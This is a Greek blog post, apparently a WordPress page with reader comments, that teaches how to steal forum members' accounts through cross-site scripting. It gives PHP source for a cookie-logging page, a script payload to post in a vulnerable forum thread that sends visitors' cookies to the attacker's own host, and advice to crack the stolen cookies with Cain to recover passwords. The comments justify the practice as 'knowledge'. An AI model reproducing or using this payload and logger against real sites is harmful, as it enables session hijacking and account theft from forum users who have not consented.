Πώς να κλέψουμε τα account μελών από ένα φόρουμ

Μία από τις πιο διαδεδομένες τεχνικές για να κλέψουμε τον λογαριασμό κάποιου χρήστη ή και πολλών χρηστών είναι να χρησιμοποιήσουμε την μέθοδο XSS (Cross Site Scripting).

Θα πρέπει καταρχάς να χρησιμοποιήσουμε κάποιο web vulnerability scanner όπως το Acunetix ή το Paros για να βρούμε τα ευάλωτα φόρουμ σε επιθέσεις XSS.Μόλις εντοπίσουμε τον στόχο μας ακολουθούμε την παρακάτω διαδικασία.

1)Δημιουργούμε ένα αρχείο με το όνομα cookie.php και εισάγουμε τον παρακάτω κώδικα:

<?php
$cookie = $_GET['c'
];
$ip = getenv (’REMOTE_ADDR’
);
$date=date(”j F, Y, g:i a”
);;
$referer=getenv (’HTTP_REFERER’
);
$fp = fopen(’cookies.html’, ‘a’
);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’
);
fclose($fp
);
header (”Location: http://www.test.com
”);
?> 
 

Το αρχείο cookie.php το ανεβάζουμε σε κάποιο host site που έχουμε.Φυσικά στην προτελευταία σειρά τοποθετούμε την διεύθυνση του host μας αντί για test.com δηλαδή.

2)Δημιουργούμε ένα νέο thread στο ευάλωτο φόρουμ και πληκτρολογούμε το ακόλουθο:

<script>document.location=”http://www.myhost.com/cookie.php?c=” + document.cookies</script>

Φυσικά στο myhost.com βάζουμε το δικό μας host όπως είναι κατανοητό.

Τώρα όταν κάποιο μέλος του φόρουμ ανοίξει το thread τα cookies του θα σταλούν στο:

http://www.myhost.com/cookie.html

Οπότε έχοντας το cookie και σε συνδοιασμό με το πρόγραμμα Cain ή κάποιο άλλο cookie decoder θα μπορέσουμε να αποκρυπτογραφήσουμε το cookie για να βρούμε το password. 

6 Σχόλια to “Πώς να κλέψουμε τα account μελών από ένα φόρουμ”

  1. Και για ποιο λογο να κανουμε κατι τετοιο;

    Καλημερα.

  2. Γιατί μπορούμε!!!🙂

  3. το αντιθετο να ασφαλίσουμε ενα φόρουμ από τετοιου είδους επιθέσεις ?

  4. Αντώνη οι λόγοι στο hacking μπορεί να είναι πολλοί και ο καθένας κρίνεται από τις πράξεις του.Εξού και οι χάκερς διακρίνονται σε Whitehat hackers και blackhat hackers αναλόγως το πόσο το κάνουν για την πληροφορία ή για την καταστροφή.Άρα λοιπόν ο λόγος θα μπορούσε να είναι για να δούμε καταρχάς αν μπορούμε να τα καταφέρουμε για την προσωπική μας γνώση και τι πληροφορίες μπορούμε να αποκομίσουμε από αυτό.Εξάλλου το hacking είναι συνώνυμο της γνώσης.Ωστόσο δεν το συνίστω για καταστροφές και για να το δείξουμε στους φίλους μας το τι μπορούμε να κάνουμε.

    Δημήτρη τώρα όσον αφορά την ασφάλεια από επιθέσεις XSS θα γράψω ένα tutorial σύντομα αν ενδιαφέρεσαι.Δυστηχώς δεν είναι κάτι που μπορεί να αναφερθεί και να καλυφθεί μέσα σε ένα σχόλιο.Οπότε μέσα στις επόμενες μέρες θα σου έχω κάποιο θέμα.😉

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Αρέσει σε %d bloggers: